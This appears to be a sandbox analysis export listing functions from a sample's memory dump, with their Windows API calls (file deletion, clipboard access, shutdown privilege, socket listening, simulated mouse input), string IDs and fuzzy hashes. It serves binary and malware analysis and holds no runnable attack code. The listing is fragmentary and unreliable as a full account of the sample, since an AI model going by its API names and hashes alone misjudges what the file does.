                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                  • String ID:
                                  • API String ID: 420908878-0
                                  • Opcode ID: 2ee326c218b587831cc4005db1a78cb9e9859936361d834f3ba4bee71a172c2c
                                  • Instruction ID: 7d3f6967a80262b54aecd1e62d6e34fceb7568ab3e93ccc36112e46ce6a6226f
                                  • Opcode Fuzzy Hash: 2ee326c218b587831cc4005db1a78cb9e9859936361d834f3ba4bee71a172c2c
                                  • Instruction Fuzzy Hash: 7361BE352042419FD312EF24C899F2A77A8AF84714F09561DF856DB2E2DB31DD0ACB62
                                  Function 003C698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 003C69BE
                                  • FindClose.KERNEL32(00000000), ref: 003C6A12
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003C6A4E
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003C6A75
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 003C6AB2
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 003C6ADF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                  • API String ID: 3830820486-3289030164
                                  • Opcode ID: 23958481cda8e5369221f4341fd6d114d02e7f166942a9998706e40287713bb1
                                  • Instruction ID: 796b8028238b64b18646e48bfbdb4aa12fedb971b185e3f511b152e55ff66056
                                  • Opcode Fuzzy Hash: 23958481cda8e5369221f4341fd6d114d02e7f166942a9998706e40287713bb1
                                  • Instruction Fuzzy Hash: FDD17471508340AFC711EB64D886EAFB7ECAF88705F44491EF985CB1A1EB74DA48C762
                                  Function 003C9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003C9663
                                  • GetFileAttributesW.KERNEL32(?), ref: 003C96A1
                                  • SetFileAttributesW.KERNEL32(?,?), ref: 003C96BB
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 003C96D3
                                  • FindClose.KERNEL32(00000000), ref: 003C96DE
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 003C96FA
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003C974A
                                  • SetCurrentDirectoryW.KERNEL32(00416B7C), ref: 003C9768
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 003C9772
                                  • FindClose.KERNEL32(00000000), ref: 003C977F
                                  • FindClose.KERNEL32(00000000), ref: 003C978F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                  • String ID: *.*
                                  • API String ID: 1409584000-438819550
                                  • Opcode ID: bfc21d278187bc07717d5a874135658751257443a93d492178113ea27eb97e13
                                  • Instruction ID: 42dbb1a8fbe48645fbd23807c27522642752a5060dd25f3ee92c2bb0c63b2268
                                  • Opcode Fuzzy Hash: bfc21d278187bc07717d5a874135658751257443a93d492178113ea27eb97e13
                                  • Instruction Fuzzy Hash: 9E31E0325412596ACF26AFB4DC4DFDE37ACAF09320F12465AF915E60E0DB74DE818B14
                                  Function 003C979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003C97BE
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 003C9819
                                  • FindClose.KERNEL32(00000000), ref: 003C9824
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 003C9840
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003C9890
                                  • SetCurrentDirectoryW.KERNEL32(00416B7C), ref: 003C98AE
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 003C98B8
                                  • FindClose.KERNEL32(00000000), ref: 003C98C5
                                  • FindClose.KERNEL32(00000000), ref: 003C98D5
                                    • Part of subcall function 003BDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003BDB00
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                  • String ID: *.*
                                  • API String ID: 2640511053-438819550
                                  • Opcode ID: a121f8e61ce1865127aa6b79545be5f92f5e1eb22f8217682055566f2db46720
                                  • Instruction ID: 06aae09cb405888773ea5ab2789e16a6fd363fa561034875a5edf075e676ac1b
                                  • Opcode Fuzzy Hash: a121f8e61ce1865127aa6b79545be5f92f5e1eb22f8217682055566f2db46720
                                  • Instruction Fuzzy Hash: CA31D2325003596ADF26AFA4DC49FDE37ACAF0A320F12455AE914E70D0DB75DE858B24
                                  Function 003C8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 003C8257
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 003C8267
                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003C8273
                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003C8310
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003C8324
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003C8356
                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003C838C
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003C8395
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CurrentDirectoryTime$File$Local$System
                                  • String ID: *.*
                                  • API String ID: 1464919966-438819550
                                  • Opcode ID: 6f7e48747dbd010319aec79a0bcaf16f796cbdb65f7c5f08b4b2042610a62356
                                  • Instruction ID: a2b7536bd1f5659d0b1b5c2b935482f3374318e1a84975d5fd32dfc3c9ed0f64
                                  • Opcode Fuzzy Hash: 6f7e48747dbd010319aec79a0bcaf16f796cbdb65f7c5f08b4b2042610a62356
                                  • Instruction Fuzzy Hash: D16169765143459FCB11EF60C844E9EB3E8BF89314F04891EE989CB251EB35EE49CB92
                                  Function 003BD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00353AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00353A97,?,?,00352E7F,?,?,?,00000000), ref: 00353AC2
                                    • Part of subcall function 003BE199: GetFileAttributesW.KERNEL32(?,003BCF95), ref: 003BE19A
                                  • FindFirstFileW.KERNEL32(?,?), ref: 003BD122
                                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 003BD1DD
                                  • MoveFileW.KERNEL32(?,?), ref: 003BD1F0
                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 003BD20D
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 003BD237
                                    • Part of subcall function 003BD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,003BD21C,?,?), ref: 003BD2B2
                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 003BD253
                                  • FindClose.KERNEL32(00000000), ref: 003BD264
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                  • String ID: \*.*
                                  • API String ID: 1946585618-1173974218
                                  • Opcode ID: ca07a61c44d247a317c53af4507cb0d926b6a82cb6d977a4f0c3043d15c37302
                                  • Instruction ID: b80e489d03699de448b70d36385658f2d6beb82609f56a70502df61997e4f710
                                  • Opcode Fuzzy Hash: ca07a61c44d247a317c53af4507cb0d926b6a82cb6d977a4f0c3043d15c37302
                                  • Instruction Fuzzy Hash: 25616D31C0114DABCF16EBE4C992DEDB7B9AF15305F244565E9027B1A2EB30AF09DB60
                                  Function 003CED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                  • String ID:
                                  • API String ID: 1737998785-0
                                  • Opcode ID: 0f2c7ad402ec5d137a9ac06c81d608407c6921c56b6dde4f2835480f44d7ded8
                                  • Instruction ID: cdc4dad88560c3f437c19aead641ddc09fa76528375f252656f33ea9cd3214f9
                                  • Opcode Fuzzy Hash: 0f2c7ad402ec5d137a9ac06c81d608407c6921c56b6dde4f2835480f44d7ded8
                                  • Instruction Fuzzy Hash: 8041AC31204251AFE722DF25D888F1ABBA9EF44358F15C59DE8168F6A2C735EC42CB90
                                  Function 003BE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003B16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003B170D
                                    • Part of subcall function 003B16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003B173A
                                    • Part of subcall function 003B16C3: GetLastError.KERNEL32 ref: 003B174A
                                  • ExitWindowsEx.USER32(?,00000000), ref: 003BE932
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                  • String ID: $ $@$SeShutdownPrivilege
                                  • API String ID: 2234035333-3163812486
                                  • Opcode ID: ab62e3202c34ea82987000f3c8c0024ee34671266046955ca8ea7554601a2387
                                  • Instruction ID: 06fc6226855ea0929d6eab472766b6789aa3e0c64353ad8bede6521f98b537d1
                                  • Opcode Fuzzy Hash: ab62e3202c34ea82987000f3c8c0024ee34671266046955ca8ea7554601a2387
                                  • Instruction Fuzzy Hash: DB012B73620310AFEB6626B89C85BFF725C9704748F150522FE13E68D1D7685C448190
                                  Function 003D1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003D1276
                                  • WSAGetLastError.WSOCK32 ref: 003D1283
                                  • bind.WSOCK32(00000000,?,00000010), ref: 003D12BA
                                  • WSAGetLastError.WSOCK32 ref: 003D12C5
                                  • closesocket.WSOCK32(00000000), ref: 003D12F4
                                  • listen.WSOCK32(00000000,00000005), ref: 003D1303
                                  • WSAGetLastError.WSOCK32 ref: 003D130D
                                  • closesocket.WSOCK32(00000000), ref: 003D133C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                  • String ID:
                                  • API String ID: 540024437-0
                                  • Opcode ID: bd8166dab8f9bbe314a0c8cc2b39dffafd6fd076a1051436c348acf04e4150b4
                                  • Instruction ID: 5f1b2ff0efd1acb063c155731b21bd2e42c4668495866adeca289b7347b93246
                                  • Opcode Fuzzy Hash: bd8166dab8f9bbe314a0c8cc2b39dffafd6fd076a1051436c348acf04e4150b4
                                  • Instruction Fuzzy Hash: 8041C331600240AFD725DF64D5C4B29BBE5AF46318F198589E8568F3E6C731ED86CBE0
                                  Function 003BD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00353AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00353A97,?,?,00352E7F,?,?,?,00000000), ref: 00353AC2
                                    • Part of subcall function 003BE199: GetFileAttributesW.KERNEL32(?,003BCF95), ref: 003BE19A
                                  • FindFirstFileW.KERNEL32(?,?), ref: 003BD420
                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 003BD470
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 003BD481
                                  • FindClose.KERNEL32(00000000), ref: 003BD498
                                  • FindClose.KERNEL32(00000000), ref: 003BD4A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                  • String ID: \*.*
                                  • API String ID: 2649000838-1173974218
                                  • Opcode ID: 99f5475c5e0e4844910632c699c87b67e57f505e620d1aca14c2ea2dad497358
                                  • Instruction ID: 820bd1c9b070a9080881d5bd862893ec98910d94de034425ad890353447aaa37
                                  • Opcode Fuzzy Hash: 99f5475c5e0e4844910632c699c87b67e57f505e620d1aca14c2ea2dad497358
                                  • Instruction Fuzzy Hash: 22318D310183859BC612EF64C892DEFB7E8AE91315F404E2DF9D1971A1EB30AA0D8762
                                  Function 0038E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: __floor_pentium4
                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                  • API String ID: 4168288129-2761157908
                                  • Opcode ID: 4e277b0e075c3037f2f4a74cde2e06e668cd83fbea0f1c147bea4bd552b9bcb5
                                  • Instruction ID: 5765248c2ac379e25b67a2144b17b9b795d53483e8b472d3c5c1ec5cc0eb0918
                                  • Opcode Fuzzy Hash: 4e277b0e075c3037f2f4a74cde2e06e668cd83fbea0f1c147bea4bd552b9bcb5
                                  • Instruction Fuzzy Hash: 65C23C71E086288FDB26EF28DD407EAB7B9EB45305F1541EAD44DE7241E778AE818F40
                                  Function 003C648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcslen.LIBCMT ref: 003C64DC
                                  • CoInitialize.OLE32(00000000), ref: 003C6639
                                  • CoCreateInstance.OLE32(003EFCF8,00000000,00000001,003EFB68,?), ref: 003C6650
                                  • CoUninitialize.OLE32 ref: 003C68D4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                  • String ID: .lnk
                                  • API String ID: 886957087-24824748
                                  • Opcode ID: 1d53bd0d55b7b78406c88367888a4099ed667a3be6229037de1312e37d7179a5
                                  • Instruction ID: a619aac57cdb971df7d085255da10d7c32bc6c425d4fc09161090d385fff25ac
                                  • Opcode Fuzzy Hash: 1d53bd0d55b7b78406c88367888a4099ed667a3be6229037de1312e37d7179a5
                                  • Instruction Fuzzy Hash: 77D14871508301AFC315DF24C881E6BB7E8EF95705F50496DF9958B2A2EB70ED09CB92
                                  Function 003D22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetForegroundWindow.USER32(?,?,00000000), ref: 003D22E8
                                    • Part of subcall function 003CE4EC: GetWindowRect.USER32(?,?), ref: 003CE504
                                  • GetDesktopWindow.USER32 ref: 003D2312
                                  • GetWindowRect.USER32(00000000), ref: 003D2319
                                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 003D2355
                                  • GetCursorPos.USER32(?), ref: 003D2381
                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003D23DF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                  • String ID:
                                  • API String ID: 2387181109-0
